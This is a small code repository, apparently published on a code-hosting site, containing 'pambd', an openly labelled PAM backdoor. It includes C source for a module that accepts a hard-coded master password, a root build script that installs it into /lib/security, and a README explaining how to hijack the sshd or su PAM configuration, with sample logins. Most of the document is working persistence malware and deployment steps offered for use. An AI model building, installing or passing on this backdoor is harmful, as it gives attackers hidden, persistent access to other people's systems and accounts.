├── gen.sh ├── LICENSE ├── pambd.c └── README.md /gen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # gen.sh - generate the pam backdoor. 3 | 4 | BIN_GCC='/usr/bin/gcc' 5 | BIN_LD='/usr/bin/ld' 6 | BIN_RM='/bin/rm' 7 | 8 | CFLAGS='-fPIC' 9 | LDFLAGS='-x --shared' 10 | 11 | if [ "$(id -u)" != '0' ]; then 12 | echo 'This script must be run as root!' 1>&2 13 | exit 1 14 | fi 15 | 16 | ${BIN_GCC} ${CFLAGS} -c pambd.c 17 | ${BIN_LD} ${LDFLAGS} -o /lib/security/pam_bd.so pambd.o 18 | ${BIN_RM} pambd.o -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 Federico Fazzi 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /pambd.c: -------------------------------------------------------------------------------- 1 | /** 2 | * pambd.c - A small pam backdoor. 3 | * Federico Fazzi 4 | * 5 | * This trick shows you how to create a PAM module backdoor that 6 | * allows to execute an user login with your own custom password. 7 | * 8 | * If you try to make the login with the real password of the target 9 | * user and the authentication fails, the pam_auth.so switches to the 10 | * pambd.so and viceversa! 11 | * 12 | * (c) 2015 - MIT License. 13 | */ 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define MYPASSWD "my_master_passwd" 23 | 24 | PAM_EXTERN int pam_sm_setcred 25 | (pam_handle_t *pamh, int flags, int argc, const char **argv) { 26 | return PAM_SUCCESS; 27 | } 28 | 29 | PAM_EXTERN int pam_sm_acct_mgmt 30 | (pam_handle_t *pamh, int flags, int argc, const char **argv) { 31 | return PAM_SUCCESS; 32 | } 33 | 34 | PAM_EXTERN int pam_sm_authenticate 35 | (pam_handle_t *pamh, int flags,int argc, const char **argv) { 36 | char *password = NULL; 37 | 38 | pam_get_authtok(pamh, PAM_AUTHTOK, (const char **)&password, NULL); 39 | 40 | if (!strncmp(password, MYPASSWD, strlen(MYPASSWD))) 41 | return PAM_SUCCESS; 42 | 43 | return -1; 44 | } 45 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | pambd 2 | ===== 3 | 4 | Introduction 5 | ------------ 6 | 7 | This trick shows you how to create a PAM module backdoor that 8 | allows to execute an user login with your own custom password. 9 | 10 | If you try to make the login with the real password of the target 11 | user and the authentication fails, the pam_auth.so switches to the 12 | pambd.so and viceversa. 13 | 14 | 15 | Generate the backdoor 16 | --------------------- 17 | 18 | If you get the error: 19 | 20 | ```bash 21 | pambd.c:13:31: fatal error: security/pam_appl.h: No such file or directory 22 | ``` 23 | 24 | First install the package **libpam-dev** that contains the needed headers file for compilation: 25 | 26 | ```bash 27 | deftcode pambd $ sudo apt-get install libpam0g-dev 28 | ``` 29 | 30 | Now edit the **pambd.c** and set your master custom password: 31 | 32 | ```c 33 | #define MYPASSWD "my_master_passwd" 34 | ``` 35 | 36 | After that, generate the pam backdoor with: 37 | (It needs the root permissions) 38 | 39 | ```bash 40 | deftcode pambd $ sudo sh gen.sh 41 | ``` 42 | 43 | This will generate the pam backdoor at **/lib/security/pambd.so**. 44 | 45 | 46 | Configure the PAM service you want to hijack 47 | -------------------------------------------- 48 | 49 | Edit the **/etc/pam.d/sshd** or other that use PAM like **/etc/pam.d/su** and then replace the content with these lines: 50 | 51 | ```bash 52 | nauth sufficient pam_rootok.so 53 | auth sufficient pam_unix.so # This must be 'sufficient'. 54 | account required pam_unix.so 55 | session required pam_unix.so 56 | auth sufficient pambd.so # This is our pam backdoor. 57 | account sufficient pambd.so # -- 58 | ``` 59 | 60 | 61 | Test the backdoor 62 | ----------------- 63 | 64 | After you have created the pambd backdoor, you can test It. 65 | 66 | ```bash 67 | deftcode pambd $ file /lib/security/pambd.so 68 | /lib/security/pambd.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped 69 | ``` 70 | 71 | Example with the **SSH** service: 72 | 73 | ```bash 74 | deftcode pambd $ ssh eurialo@deftcode.local 75 | eurialo@deftcode.local password: 76 | 77 | # eg. enter: my_master_passwd or real_user_password 78 | 79 | Last login: Thu May 21 05:55:13 2015 from localhost 80 | deftcode ~ $ 81 | ``` 82 | 83 | Example with **su**: 84 | 85 | ```bash 86 | deftcode pambd $ su - 87 | Password: 88 | 89 | # eg. enter: my_master_passwd or real_user_password 90 | 91 | deftcode ~ # 92 | ``` 93 | --------------------------------------------------------------------------------